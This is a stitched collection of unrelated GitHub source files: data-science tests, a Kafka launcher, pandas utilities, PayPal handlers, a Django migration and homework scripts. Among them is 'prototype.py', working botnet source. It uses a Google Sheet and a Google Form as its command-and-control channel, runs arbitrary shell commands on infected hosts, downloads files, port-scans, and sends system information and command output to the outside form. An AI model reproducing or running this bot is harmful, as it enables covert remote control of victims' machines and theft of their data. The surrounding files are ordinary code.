cc.build_idf(description_column_name='description')
cc.filter_desc_by_idf(description_column_name='description',
number_words_to_cut=number_to_remove)
# Create a CompanyGraph instance
cg = CompanyGraph(cc)
cg.build_lsh_forest(company_name_column_name='domain')
cg.build_graph(sensitivity=4)
# Run test of function
print(cg.graph.todense())
dot_product_score = cg.get_dot_product_score('company_1', 'company_3')
print(dot_product_score)
self.assertNotEqual(0., dot_product_score)
def test_get_jaccard_similarity(self):
# Create a CompanyCorpus instance, and initialize it with some data
test_corpus = [['company_1', 'Provider of software'], ['company_2', 'Provider of hardware technology'],
['company_3', 'Provider of Software technology'], ['company_4', 'Provider of software service']]
test_input = pd.DataFrame(test_corpus, columns=['domain', 'description'])
cc = CompanyCorpus(test_input)
number_to_remove = 1
cc.build_idf(description_column_name='description')
cc.filter_desc_by_idf(description_column_name='description',
number_words_to_cut=number_to_remove)
# Create a CompanyGraph instance
cg = CompanyGraph(cc)
cg.build_lsh_forest(company_name_column_name='domain')
cg.build_graph(sensitivity=3)
# print(cg.graph.todense())
# Run test of function
jaccard_similarity = cg.get_jaccard_similarity('company_1', 'company_3')
self.assertNotEqual(0., jaccard_similarity)
if __name__ == '__main__':
unittest.main()
|
[
"noreply@github.com"
] |
meeranmismail.noreply@github.com
|
bb70917bf01dbab86fba90d144a6ab13ff8fee5e
|
c54fff2c9a8bc3548824f99a1667d4ada2652cc6
|
/kafka_server.py
|
2b767c031ef5d1d6ebf62bc588138eb0fe2722b2
|
[] |
no_license
|
tfenton/udacity-sf-crime-stats
|
20d0228b9ba9fadc85e86c02cff7934d1632d950
|
ebf661cff30e202344df16584c681ea3e8d967b6
|
refs/heads/master
| 2022-11-29T18:27:54.568875
| 2020-07-29T20:52:27
| 2020-07-29T20:52:27
| 283,592,485
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 683
|
py
|
import producer_server
def run_kafka_server():
"""
creates the kafka producer object
params - None
returns - kafka producer
"""
# TODO get the json file path
input_file = "police-department-calls-for-service.json"
# TODO fill in blanks
producer = producer_server.ProducerServer(
input_file=input_file,
topic="calls",
bootstrap_servers="localhost:9092",
client_id=None
)
return producer
def feed():
"""
    starts the kafka producer and generates data from the input file
params - None
returns - None
"""
producer = run_kafka_server()
producer.generate_data()
if __name__ == "__main__":
feed()
|
[
"tfenton@gmail.com"
] |
tfenton@gmail.com
|
4480c797b15a575e7d8ac1d0d15828b55ab7d84e
|
e5939977c8d04b8c805520c90b3b3799f17a688c
|
/prototype.py
|
afd313c04cd8731c5b075f5c5a339ce5d692e6e2
|
[
"MIT"
] |
permissive
|
zard777/xbot_remastered
|
186b815f2a975a0ecb2c5f3523ff2e900eadbbdc
|
0e837923c0d8e07c9d90ee511b5220b170bc34ae
|
refs/heads/master
| 2021-09-11T00:53:51.210173
| 2018-04-05T04:54:38
| 2018-04-05T04:54:38
| 76,875,702
| 0
| 1
| null | 2018-02-10T09:30:15
| 2016-12-19T15:55:40
|
Python
|
UTF-8
|
Python
| false
| false
| 9,580
|
py
|
'''
=============
Zantetsuken remastered
============
'''
import __main__,urllib,urllib2,httplib,base64,threading,random,platform,os,subprocess
from socket import *
from HTMLParser import HTMLParser
cmdrcv=''
feed="https://spreadsheets.google.com/feeds/list/[REPLACE_WITH_YOUR_OWN]/1/public/basic?alt=rss"
actionurl="https://docs.google.com/forms/d/e/[REPLACE_WITH_YOUR_OWN]/formResponse"
cmdz='entry. '
resp='entry. '
connected='entry. '
#Command Extraction
class MyParser(HTMLParser):
commands = ""
is_present = ""
def handle_starttag(self, tag,attrs):
if tag == 'description':
self.is_present = 1
def handle_data(self, data):
global cmdrcv
if self.is_present:
if "command:" in data:
self.commands = data
cmdrcv=self.commands.replace("command: ","")
self.is_title = 0
#Thread for checking new commmands.
class check_commands(threading.Thread):
def __init__(self,botid):
threading.Thread.__init__(self)
self.event = threading.Event()
self.botid=botid
def run(self):
global cmdrcv,connected,actionurl,cmdz,resp,feed
try:
while not self.event.is_set():
file=urllib2.urlopen(feed)
xml=file.read()
file.close()
parser = MyParser()
parser.feed(xml)
#print cmdrcv
#self.id -->botid
if botid in cmdrcv or "xBOTALL" in cmdrcv:
#print cmdrcv
if botid in cmdrcv:
cmdrcv=cmdrcv.replace(botid+' ','')
elif "xBOTALL" in cmdrcv:
cmdrcv=cmdrcv.replace("xBOTALL ","")
if cmdrcv=="xSYSINFO":
sys_info(cmdz,resp,botid)
elif "xDOWNLOAD" in cmdrcv:
url=cmdrcv.replace("xDOWNLOAD ","")
download(url,cmdz,resp,botid)
elif "xUPLOAD" in cmdrcv:
filepath=cmdrcv.replace("xUPLOAD ","")
upload(filepath,cmdz,resp,botid)
elif "xEXECUTE" in cmdrcv:
cmd=cmdrcv.replace("xEXECUTE ","")
execute(cmd,cmdz,resp,botid)
elif "xPORTSCAN" in cmdrcv:
host=cmdrcv.replace("xPORTSCAN ","")
portscan(host,cmdz,resp,botid)
elif cmdrcv=="xSCREENSHOT":
screenshot(cmdz,resp,botid)
elif cmdrcv=="xNETWORK":
network(cmdz,resp,botid)
elif cmdrcv=="xKILL":
selfkill(cmdz,resp,botid,actionurl,connected)
elif cmdrcv=="xDONE":
pass
else:
pass
except:
pass
self.event.wait(timeout=5)
#send back responses to C&C.
def output(op_data,field):
global actionurl
response={field:op_data}
try:
dataenc=urllib.urlencode(response)
req=urllib2.Request(actionurl,dataenc)
urllib2.urlopen(req)
except:
pass
#system information module
def sys_info(cmdz,resp,botid):
try:
op=''
if platform.system()=="Windows":
for i in os.popen("systeminfo"):
op=op+str(i)
elif platform.system()=="Linux":
for i in os.popen("cat /proc/version"):
op=op+str(i)
for i in os.popen("whoami"):
op=op+"User: " +str(i)
for i in os.popen("cat /proc/cpuinfo"):
op=op+str(i)
elif platform.system()=="Darwin":
for i in os.popen("sw_vers"):
op=op+str(i)
for i in os.popen("system_profiler -detailLevel basic"):
op=op+str(i)
output(botid+': '+op,resp)
output(botid+" xDONE",cmdz)
except Exception as e:
output(botid+': '+str(e),resp)
#download module
def download(url,cmdz,resp,botid):
try:
filename=url.split('/')
filename=filename.pop()
f=urllib2.urlopen(url)
data=f.read()
f.close()
final=open(filename, "wb")
final.write(data)
final.close()
output(botid+': '+filename + " downloaded sucessfully",resp)
output(botid+" xDONE",cmdz)
except Exception as e:
output(botid+": Download failed with exception: "+str(e),resp)
#execute system commands
def execute(exe,cmdz,resp,botid):
try:
op=''
for i in os.popen(exe):
op=op+str(i)
output(botid+": "+op,resp)
output(botid+" xDONE",cmdz)
except Exception as e:
output(botid+": "+str(e),resp)
#file upload module
# def upload(filepath,cmdz,resp,botid):
# try:
# fileupload(filepath,"/data/up.php")
# if platform.system()=="Windows":
# if "\\" in filepath:
# filename=filepath.split('\\')
# filename=filename.pop()
# else:
# filename=filepath
# elif platform.system()=="Darwin" or platform.system()=="Linux":
# if '/' in filepath:
# filename=filepath.split('/')
# filename=filename.pop()
# else:
# filename=filepath
# output(botid+": http://xboz.xxxxx.com/data/files/"+filename,resp)
# output(botid+" xDONE",cmdz)
# except Exception as e:
# output(botid+": "+str(e),resp)
#network module
def network(cmdz,resp,botid):
try:
op=''
if platform.system()=="Windows":
for i in os.popen("ipconfig"):
op=op+str(i)
elif platform.system()=="Darwin" or platform.system()=="Linux":
for i in os.popen("ifconfig"):
op=op+str(i)
output(botid+": "+op,resp)
output(botid+" xDONE",cmdz)
except Exception as e:
output(botid+': '+str(e),resp)
#portscanner module
def portscan(host,cmdz,resp,botid):
try:
op='Starting Port Scanner '
targetIP = gethostbyname(host)
for i in range(20, 5000):
s = socket(AF_INET, SOCK_STREAM)
result = s.connect_ex((targetIP, i))
if(result == 0) :
op=op+'PORT %d: OPEN\n' %(i,)
s.close()
output(botid+": "+op,resp)
output(botid+" xDONE",cmdz)
except Exception as e:
output(botid+": "+str(e),resp)
#screenshot module
# def screenshot(cmdz,resp,botid):
# try:
# if platform.system()=='Linux':
# os.system("gnome-screenshot -f screenshot.png")
# elif platform.system()=='Darwin':
# os.system("screencapture -x -t png /var/TMP/screenshot.png")
# elif platform.system()=='Windows':
# f=urllib2.urlopen("http://xboz.xxxx.com/data/screenshot.exe")
# data=f.read()
# f.close()
# final=open("screenshot.exe", "wb")
# final.write(data)
# final.close()
# info = subprocess.STARTUPINFO()
# info.dwFlags = 1
# info.wShowWindow = 0
# subprocess.Popen("screenshot.exe", startupinfo=info)
# os.remove("screenshot.exe")
# if platform.system()=='Darwin':
# fileupload("/var/TMP/screenshot.png","/screenshot/up.php")
# os.remove("/var/TMP/screenshot.png")
# else:
# fileupload("screenshot.png","/screenshot/up.php")
# os.remove('screenshot.png')
# output(botid+": http://xboz.xxxxx.com/screenshot/screenshot.png",resp)
# output(botid+" xDONE",cmdz)
# except Exception as e:
# output(botid +": "+str(e),resp)
#kill and terminate
#remote file upload
# def fileupload(path,remote_dir):
# data = open(path, 'rb').read()
# encodedData = base64.encodestring( data )
# headers = { "Content-type": "application/x-www-form-urlencoded",
# "Accept": "text/plain",
# }
# params = urllib.urlencode({ u'fileName': os.path.split(path)[1],
# u'data':encodedData})
# conn = httplib.HTTPConnection( "xboz.xxxxx.com")
# conn.request( "POST", remote_dir, params, headers )
# response = conn.getresponse( )
# conn.close( )
#unique bot registration
def bot_reg(actionurl,field):
botid="unknown"
if platform.system()=="Windows":
botid="xBOTW"+str(random.randrange(1,500))
elif platform.system()=="Linux":
botid="xBOTL"+str(random.randrange(501,1000))
elif platform.system()=="Darwin":
botid="xBOTM"+str(random.randrange(1001,1500))
response={field:botid}
try:
dataenc=urllib.urlencode(response)
req=urllib2.Request(actionurl,dataenc)
urllib2.urlopen(req)
except:
botid="nil"
pass
return botid
botid="nil"
while botid=="nil":
botid=bot_reg(actionurl,connected)
if "nil" not in botid:
break
print "xBOT id:"+botid
xbot=check_commands(botid)
xbot.start()
|
[
"noreply@github.com"
] |
zard777.noreply@github.com
|
7e01aa77d4d51c95038ece930c7ba331c6932669
|
c17dfb99ed7e0273ae43a1bd99441906cb8dcf38
|
/utilities/fortran_ports.py
|
5fc0c882f18c6e71db1cd5a4c9eb9725ba220d27
|
[] |
no_license
|
samgill844/gpuastro
|
80d457858dbf43d20f0d37bbf147218d977818d8
|
864f77586e7e43a74e1cba150761a169ecbd56d0
|
refs/heads/master
| 2020-04-19T18:25:47.279379
| 2019-02-05T20:43:39
| 2019-02-05T20:43:39
| 131,284,629
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 314
|
py
|
import numba
@numba.njit(fastmath=True)
def sign(a,b) :
if b >= 0.0 : return abs(a)
return -abs(a)
@numba.njit
def SameSign(a, b) : return ((a== b) & (a==0)) | (a*b>0)
@numba.njit(fastmath=True)
def clip(a, b, c):
if (a < b) : return b
elif (a > c) : return c
else : return a
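# Illustrative usage (added, not part of the original module):
#   sign(3.0, -2.0)     -> -3.0  # magnitude of the first argument, sign of the second
#   SameSign(-1, -5)    -> True
#   clip(5.0, 0.0, 3.0) -> 3.0   # clamp the first argument into the range [b, c]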
|
[
"samgill844@gmail.com"
] |
samgill844@gmail.com
|
4c4d7952e9db0f353efbd75b69aeb3904932c516
|
921de16901ec5ce924cf0c01b8af26bba5b4cb66
|
/Hnome-testtask2014-aec34317d9ed/clusterization/tasks.py
|
74288120906af76f7c2ce72697f33697a0e4dccc
|
[] |
no_license
|
RooshRoosh/open_layers_spatialite_testtask
|
b7c36073278d5d7141d10d90751fb5003b32fc13
|
aff30cd09380af8681c034c733cfbcc7acab8417
|
refs/heads/master
| 2021-01-23T13:22:21.387375
| 2014-07-12T11:51:02
| 2014-07-12T11:51:02
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,376
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
__author__ = 'Ruslan Talipov'
import apsw
import json
import logging
logging.basicConfig(format='%(levelname)s:%(message)s', level=logging.DEBUG)
class ClusterizationTask(object):
def __init__(self, feed_table, cluster_table, distance, start_location,
primitive_count):
# self.connection = sqlite3.Connection('data.sqlite')
self.connection = apsw.Connection('./../data.sqlite')
self.connection.enableloadextension(True)
self.connection.loadextension('/usr/lib/x86_64-linux-gnu/libspatialite.so.5')
self.connection.enableloadextension(False)
self.cur = self.connection.cursor()
self.feed_table = feed_table
self.cluster_table = cluster_table
self.distance = distance
self.start_location= 'POINT(%s %s)' % (start_location[0], start_location[1])
self.primitive_count = primitive_count
def __call__(self, *args, **kwargs):
        # Grab an orphan primitive; for it we will look up all adjacent primitives
target = self._get_target()
target = self._create_cluster(target)
target_count = 1
while target:
while True:
                # create a cluster
                # for the cluster, keep fetching adjacent primitives while possible
primitive_list = self._get_neighbor_primitive_list(target)
target = self._merge_object_list(target, primitive_list, is_primitive=True)
                logging.info('%s primitives remaining' % self.primitive_count)
if not primitive_list:
break
            target = self._get_target()  # keep fetching orphan primitives until they run out
target = self._create_cluster(target)
target_count+=1
            logging.info('New target #%s' % target_count)
        logging.warning('Computation finished')
def _get_target(self):
result = self.cur.execute(
'''
SELECT PK_UID, AsGeoJSON(Geometry) FROM %s
WHERE PK_UID IN (
SELECT building_id FROM clusters_to_building
WHERE cluster_id IS NULL LIMIT 1
);
''' % self.feed_table
).fetchall()
if result:
target = result[0]
else:
target = None
return target
def _get_neighbor_primitive_list(self, primitive):
'''
        Fetch all nearest neighbours
'''
self.cur.execute('''
SELECT candidate.PK_UID, AsGeoJSON(candidate.Geometry)
FROM %s AS target, %s AS candidate
WHERE target.PK_UID = ? AND
candidate.PK_UID IN (SELECT building_id FROM clusters_to_building c2b WHERE c2b.cluster_id IS NULL)
AND Distance(target.Geometry, candidate.Geometry) < ?;
''' % (self.cluster_table, self.feed_table),
(primitive[0], self.distance)
)
        object_list = [i for i in self.cur]  # add a cursor and return a generator?
if object_list:
            logging.info('Found %s adjacent primitives for the current target' % len(object_list))
return object_list
def _get_neighbor_cluster_list(self, primitive):
'''
        Fetch all nearest clusters
'''
self.cur.execute('''
SELECT candidate.PK_UID, AsGeoJSON(candidate.Geometry)
FROM %s AS target, %s AS candidate
WHERE target.PK_UID = ? AND
candidate.PK_UID <> target.PK_UID AND
Distance(target.Geometry, candidate.Geometry) < ?;
''' % (self.cluster_table, self.cluster_table),
(primitive[0], self.distance)
)
        object_list = [i for i in self.cur]  # add a cursor and return a generator?
if object_list:
logging.info('return %s clusters' % len(object_list))
return object_list
def _merge_object_list(self, target, objects_list=[], is_primitive=True):
'''
        Merge the multipolygons
'''
        # merge the geometry
target = list(target)
target[1] = json.loads(target[1])
# logging.info(target)
target[1]['coordinates'] = list(target[1]['coordinates'])
for object_ in objects_list:
object_ = list(object_)
object_[1] = json.loads(object_[1])
target[1]['coordinates'] += object_[1]['coordinates']
if is_primitive:
self.primitive_count -= 1
                # link the new primitives to the target
self.cur.execute(
'''
UPDATE clusters_to_building SET cluster_id = ?
WHERE building_id = ?
''', ( target[0], object_[0])
)
else:
                # re-link the primitives of the old clusters to the new one
self.cur.execute(
'''
UPDATE clusters_to_building SET cluster_id = ?
WHERE cluster_id = ?
''', ( target[0], object_[0])
)
        # update the new cluster
target[1] = json.dumps(target[1])
self.cur.execute(
'''
UPDATE clusters SET Geometry=GeomFromGeoJSON('%s')
WHERE PK_UID = %s
''' % (target[1], target[0])
)
target = self.cur.execute(
'SELECT PK_UID, AsGeoJSON(Geometry) FROM clusters WHERE PK_UID = %s' % target[0]
).fetchall()[0]
# logging.info(target)
        # return the new cluster
return target
def _create_cluster(self, target):
'''
        Add a new cluster.
        The input parameter is a building record.
'''
self.cur.execute('''
INSERT INTO clusters (PK_UID,Geometry) VALUES ( Null , GeomFromGeoJSON('%s'));
''' % target[1])
cluster_id = self.cur.execute('''
SELECT PK_UID FROM clusters WHERE Geometry= GeomFromGeoJSON('%s');
''' % target[1]).fetchall()[0][0] # ? <- %s TypeError: You must supply a dict or a sequence
self.cur.execute(
'''
UPDATE clusters_to_building
SET
cluster_id = %s
WHERE building_id = %s;
''' % (cluster_id, target[0])
)
self.primitive_count-=1
        return [cluster_id, target[1]]  # return the geometry of the original building, now as a single-component cluster
if __name__ == '__main__':
task = ClusterizationTask(
feed_table = 'building',#'test_buildings',
cluster_table = 'clusters',
distance = 0.0005,
start_location = (60.607481, 56.834037),
primitive_count = 34869
)
task()
|
[
"newroosh90@gmail.com"
] |
newroosh90@gmail.com
|
39c09e923c0ade28ec0935abdb42a7f887b0bed6
|
9340f09096c9ac6b6d3f78a088382d46520d1bbb
|
/catonmat/payments.py
|
9f1066e1c0921f1e3bd38f72e112b3359e0a865e
|
[] |
no_license
|
stjordanis/catonmat.net
|
ae7c1f23fa16f6d3790aba089f942fd636e806f0
|
7b6287417c6dfc5fb3e885ec89dad94b655154d6
|
refs/heads/master
| 2022-01-15T13:55:33.197379
| 2019-01-19T13:14:33
| 2019-01-19T13:14:33
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,467
|
py
|
#!/usr/bin/python
#
# Peteris Krumins (peter@catonmat.net)
# http://www.catonmat.net -- good coders code, great reuse
#
# The new catonmat.net website.
#
# Code is licensed under GNU GPL license.
#
from werkzeug import Response
from catonmat.models import PayPalPayments
def awk_book(request):
PayPalPayments('awk_book', request).save()
return Response('ok')
def awk_book_995(request):
PayPalPayments('awk_book_995', request).save()
return Response('ok')
def awk_book_shantanu(request):
PayPalPayments('awk_book_shantanu', request).save()
return Response('ok')
def sed_book(request):
PayPalPayments('sed_book', request).save()
return Response('ok')
def sed_book_shantanu(request):
PayPalPayments('sed_book_shantanu', request).save()
return Response('ok')
def perl_book(request):
PayPalPayments('perl_book', request).save()
return Response('ok')
def june_giveaway(request):
if not 'secret' in request.form:
return Response('secret missing', 400);
if request.form['secret'] != "secret":
return Response('wrong secret', 400);
if not 'first_name' in request.form:
return Response('first_name missing', 400);
if not 'last_name' in request.form:
return Response('last_name missing', 400);
if not 'payer_email' in request.form:
return Response('payer_email missing', 400);
PayPalPayments('awk_book_june', request).save()
return Response('ok')
|
[
"peteris.krumins@gmail.com"
] |
peteris.krumins@gmail.com
|
51e8d73381c01e40aab3045aeb472100d1705ac9
|
cc29008039f27e2f7f26bb3c8d5f821d09c3d0a3
|
/pandas/core/common.py
|
34d7b7e0a2e40c34980990efea43a97664447ba7
|
[
"BSD-3-Clause"
] |
permissive
|
GunioRobot/pandas
|
dc1aea88e51d002984b65d80b3023db681fcc487
|
06c3930d4918088414c160fb8e47717ed5ec1de7
|
refs/heads/master
| 2021-01-18T11:56:56.297578
| 2011-08-23T14:51:36
| 2011-08-23T14:51:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,661
|
py
|
"""
Misc tools for implementing data structures
"""
from cStringIO import StringIO
import itertools
from numpy.lib.format import read_array, write_array
import numpy as np
import pandas._tseries as _tseries
# XXX: HACK for NumPy 1.5.1 to suppress warnings
try:
np.seterr(all='ignore')
except Exception: # pragma: no cover
pass
class PandasError(Exception):
pass
def isnull(input):
'''
Replacement for numpy.isnan / -numpy.isfinite which is suitable
for use on object arrays.
Parameters
----------
arr: ndarray or object value
Returns
-------
boolean ndarray or boolean
'''
if isinstance(input, np.ndarray):
if input.dtype.kind in ('O', 'S'):
# Working around NumPy ticket 1542
shape = input.shape
result = np.empty(shape, dtype=bool)
vec = _tseries.isnullobj(input.ravel())
result[:] = vec.reshape(shape)
else:
result = -np.isfinite(input)
else:
result = _tseries.checknull(input)
return result
def notnull(input):
'''
Replacement for numpy.isfinite / -numpy.isnan which is suitable
for use on object arrays.
Parameters
----------
arr: ndarray or object value
Returns
-------
boolean ndarray or boolean
'''
if isinstance(input, np.ndarray):
return -isnull(input)
else:
return not _tseries.checknull(input)
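# Illustrative example (added for clarity): on a float ndarray isnull marks NaNs,
# e.g. isnull(np.array([1.0, np.nan])) -> array([False, True]), and notnull is its
# complement; object arrays are instead checked element-wise via _tseries.isnullobj.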
def _pickle_array(arr):
arr = arr.view(np.ndarray)
buf = StringIO()
write_array(buf, arr)
return buf.getvalue()
def _unpickle_array(bytes):
arr = read_array(StringIO(bytes))
return arr
def null_out_axis(arr, mask, axis):
indexer = [slice(None)] * arr.ndim
indexer[axis] = mask
arr[tuple(indexer)] = np.NaN
#-------------------------------------------------------------------------------
# Lots of little utilities
def _infer_dtype(value):
if isinstance(value, (float, np.floating)):
return float
elif isinstance(value, (bool, np.bool_)):
return bool
elif isinstance(value, (int, np.integer)):
return int
else:
return object
def _is_bool_indexer(key):
if isinstance(key, np.ndarray) and key.dtype == np.object_:
mask = isnull(key)
if mask.any():
raise ValueError('cannot index with vector containing '
'NA / NaN values')
return set([True, False]).issubset(set(key))
elif isinstance(key, np.ndarray) and key.dtype == np.bool_:
return True
elif isinstance(key, list):
try:
return np.asarray(key).dtype == np.bool_
except TypeError: # pragma: no cover
return False
return False
def _default_index(n):
from pandas.core.index import NULL_INDEX
if n == 0:
return NULL_INDEX
else:
return np.arange(n)
def ensure_float(arr):
if issubclass(arr.dtype.type, np.integer):
arr = arr.astype(float)
return arr
def _mut_exclusive(arg1, arg2):
if arg1 is not None and arg2 is not None:
raise Exception('mutually exclusive arguments')
elif arg1 is not None:
return arg1
else:
return arg2
def _ensure_index(index_like):
from pandas.core.index import Index
if not isinstance(index_like, Index):
index_like = Index(index_like)
return index_like
def _any_none(*args):
for arg in args:
if arg is None:
return True
return False
def _all_not_none(*args):
for arg in args:
if arg is None:
return False
return True
def _try_sort(iterable):
listed = list(iterable)
try:
return sorted(listed)
except Exception:
return listed
def set_printoptions(precision=None, column_space=None):
"""
Alter default behavior of DataFrame.toString
precision : int
Floating point output precision
column_space : int
Default space for DataFrame columns, defaults to 12
"""
global _float_format, _column_space
if precision is not None:
float_format = '%.' + '%d' % precision + 'g'
_float_format = lambda x: float_format % x
if column_space is not None:
_column_space = column_space
_float_format = lambda x: '%.4g' % x
_column_space = 12
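# Illustrative usage (added): set_printoptions(precision=2) switches the module-level
# float formatter to '%.2g'; set_printoptions(column_space=16) widens the default
# DataFrame column space from 12.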
def _pfixed(s, space, nanRep=None, float_format=None):
if isinstance(s, float):
if nanRep is not None and isnull(s):
if np.isnan(s):
s = nanRep
return (' %s' % s).ljust(space)
if float_format:
formatted = float_format(s)
else:
is_neg = s < 0
formatted = _float_format(np.abs(s))
if is_neg:
formatted = '-' + formatted
else:
formatted = ' ' + formatted
return formatted.ljust(space)
else:
return (' %s' % s)[:space].ljust(space)
def _stringify(col):
# unicode workaround
if isinstance(col, tuple):
return str(col)
else:
return '%s' % col
def _format(s, nanRep=None, float_format=None):
if isinstance(s, float):
if nanRep is not None and isnull(s):
if np.isnan(s):
s = nanRep
return (' %s' % s)
if float_format:
formatted = float_format(s)
else:
is_neg = s < 0
formatted = _float_format(np.abs(s))
if is_neg:
formatted = '-' + formatted
else:
formatted = ' ' + formatted
return formatted
else:
return ' %s' % s
#-------------------------------------------------------------------------------
# miscellaneous python tools
def rands(n):
"""Generates a random alphanumeric string of length *n*"""
from random import Random
import string
return ''.join(Random().sample(string.letters+string.digits, n))
def adjoin(space, *lists):
"""
Glues together two sets of strings using the amount of space requested.
The idea is to prettify.
"""
outLines = []
newLists = []
lengths = [max(map(len, x)) + space for x in lists[:-1]]
# not the last one
lengths.append(max(map(len, lists[-1])))
maxLen = max(map(len, lists))
for i, lst in enumerate(lists):
nl = [x.ljust(lengths[i]) for x in lst]
nl.extend([' ' * lengths[i]] * (maxLen - len(lst)))
newLists.append(nl)
toJoin = zip(*newLists)
for lines in toJoin:
outLines.append(''.join(lines))
return '\n'.join(outLines)
def iterpairs(seq):
"""
Parameters
----------
seq: sequence
Returns
-------
iterator returning overlapping pairs of elements
Example
-------
>>> iterpairs([1, 2, 3, 4])
[(1, 2), (2, 3), (3, 4)]
"""
# input may not be sliceable
seq_it = iter(seq)
seq_it_next = iter(seq)
_ = seq_it_next.next()
return itertools.izip(seq_it, seq_it_next)
def indent(string, spaces=4):
dent = ' ' * spaces
return '\n'.join([dent + x for x in string.split('\n')])
def banner(message):
"""
Return 80-char width message declaration with = bars on top and bottom.
"""
bar = '=' * 80
return '%s\n%s\n%s' % (bar, message, bar)
class groupby(dict):
"""
A simple groupby different from the one in itertools.
Does not require the sequence elements to be sorted by keys,
however it is slower.
"""
def __init__(self, seq, key=lambda x:x):
for value in seq:
k = key(value)
self.setdefault(k, []).append(value)
__iter__ = dict.iteritems
def map_indices_py(arr):
"""
Returns a dictionary with (element, index) pairs for each element in the
given array/list
"""
return dict([(x, i) for i, x in enumerate(arr)])
def union(*seqs):
result = set([])
for seq in seqs:
if not isinstance(seq, set):
seq = set(seq)
result |= seq
return type(seqs[0])(list(result))
def difference(a, b):
return type(a)(list(set(a) - set(b)))
def intersection(*seqs):
result = set(seqs[0])
for seq in seqs:
if not isinstance(seq, set):
seq = set(seq)
result &= seq
return type(seqs[0])(list(result))
def _asarray_tuplesafe(values):
if not isinstance(values, (list, np.ndarray)):
values = list(values)
result = np.asarray(values)
if issubclass(result.dtype.type, basestring):
result = np.asarray(values, dtype=object)
if result.ndim == 2:
result = np.empty(len(values), dtype=object)
result[:] = values
return result
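# (Added usage sketch, not part of the original module.) Two of the helpers above in action:
#   list(iterpairs([1, 2, 3, 4]))   -> [(1, 2), (2, 3), (3, 4)]
#   groupby('abracadabra')          -> {'a': ['a', 'a', 'a', 'a', 'a'], 'b': ['b', 'b'], 'r': ['r', 'r'], 'c': ['c'], 'd': ['d']}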
|
[
"wesmckinn@gmail.com"
] |
wesmckinn@gmail.com
|
b939f3da2e47723692ad5c2a693a5b8777d312c6
|
9853327016c9fea768a52be5139274894c61d47c
|
/posts/migrations/0004_auto_20190730_0700.py
|
67c85cb42a4d940b88eb07b39d8e4ea6671afbd7
|
[] |
no_license
|
nickhattwick/projectidk
|
53a38fe89f28665d13249f247601005b0b9d1e52
|
d875420adb9119b9d704519353dd8dcdcd5fe016
|
refs/heads/master
| 2020-06-26T19:43:46.133593
| 2019-08-09T06:55:45
| 2019-08-09T06:55:45
| 199,736,293
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 383
|
py
|
# Generated by Django 2.2.3 on 2019-07-30 07:00
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('posts', '0003_auto_20190730_0659'),
]
operations = [
migrations.AlterField(
model_name='blog',
name='html',
field=models.CharField(max_length=10000),
),
]
|
[
"nhattwick@gmail.com"
] |
nhattwick@gmail.com
|
ce30caa166fd0795475f61197f04454655d131c0
|
abd6656ab5e913b8b5b68fcb8e0c40a7052d78b7
|
/cw6/z2.py
|
8fe0182d59f7f467c30609386bc78d040ddc0907
|
[] |
no_license
|
danskiiiii/ALK
|
4308c516b13955e28cd990a2267049007c0c6a3c
|
9926c0757597bc2c6731118a14110598bd7de2d9
|
refs/heads/master
| 2020-04-26T18:29:50.912053
| 2019-06-07T04:36:53
| 2019-06-07T04:36:53
| 173,746,591
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 466
|
py
|
# Exercise 2. (0.3 pts)
# Write a program that computes the rank of a k-element subset T of the set {1, ..., n}
# in the minimal-change (revolving-door) ordering of k-element subsets.
from scipy.special import comb as binom
n = int(input('Enter n: '))
subset = [ int(num) for num in input('Enter T: ').split() ]
rank = 0
k = len(subset)
subset.insert(0,0)
for i in range(1,k+1):
rank += (-1)**(k-i) * (binom(subset[i], i, exact=True) - 1)
print(f"rank = {rank}")
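# (Added illustrative check, not part of the original exercise.) For n = 5 and
# T = {1, 3, 5}, the formula implemented above gives
#   rank = (C(5,3) - 1) - (C(3,2) - 1) + (C(1,1) - 1) = 9 - 2 + 0 = 7,
# so entering "5" and then "1 3 5" should print "rank = 7".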
|
[
"danielwil@wp.pl"
] |
danielwil@wp.pl
|
22f86f053fb24f645b3d90d46fb117c02bdb3834
|
3c2fb2221aa68af9f909cea2b15ae883dc5f0bee
|
/hw1/h2.py
|
459d91d85e4d18dde074871a60948be2f837cd7a
|
[] |
no_license
|
RAYHOU777/ML2017
|
26c70104a4c8c53d43a56c0399a1988764cd5191
|
d6bae50984350823e63f6e0692205e3801a0f3b9
|
refs/heads/master
| 2021-03-19T16:35:54.539917
| 2017-06-08T14:53:17
| 2017-06-08T14:53:17
| 82,925,627
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 19,681
|
py
|
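# (Added summary, not part of the original homework file.) This script fits a linear
# model on PM2.5 and related air-quality features using AdaGrad-style per-parameter
# learning rates plus an extra term that reuses the previous update, writes test-set
# predictions to a CSV file, and reports the RMSE against golden.csv.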
import csv
import numpy as np
import sys
import os
rows =[]
#file = open(sys.argv[1],'r')
with open(sys.argv[1],'r') as csvfile:
reader = csv.reader(csvfile)
lstpm = []
lstpmSO = []
lstpmO3 = []
lstpmO2 = []
lstpmCO = []
lstpmWD = []
for row in reader :
if row[2] =='PM2.5' :
lstpm.append(row[3:27])
if row[2] =='SO2' :
lstpmSO.append(row[3:27])
if row[2] =='O3' :
lstpmO3.append(row[3:27])
if row[2] =='PM10' :
lstpmO2.append(row[3:27])
if row[2] =='CO' :
lstpmCO.append(row[3:27])
if row[2] =='WIND_SPEED' :
lstpmWD.append(row[3:27])
# print len(lstpm)
# print lstpm10[1]
xd_0 = []
xd_1 = []
xd_2 = []
xd_3 = []
xd_4 = []
xd_5 = []
xd_6 = []
xd_7 = []
xd_8 = []
xd10_0 = []
xd10_1 = []
xd10_2 = []
xd10_3 = []
xd10_4 = []
xd10_5 = []
xd10_6 = []
xd10_7 = []
xd10_8 = []
xd10_9 = []
xd10_10 = []
xd10_11 = []
yd = []
i=0
while i < len(lstpm) :
xd_0.insert(i,int(lstpm[i][0]))
xd_1.insert(i,int(lstpm[i][1]))
xd_2.insert(i,int(lstpm[i][2]))
xd_3.insert(i,int(lstpm[i][3]))
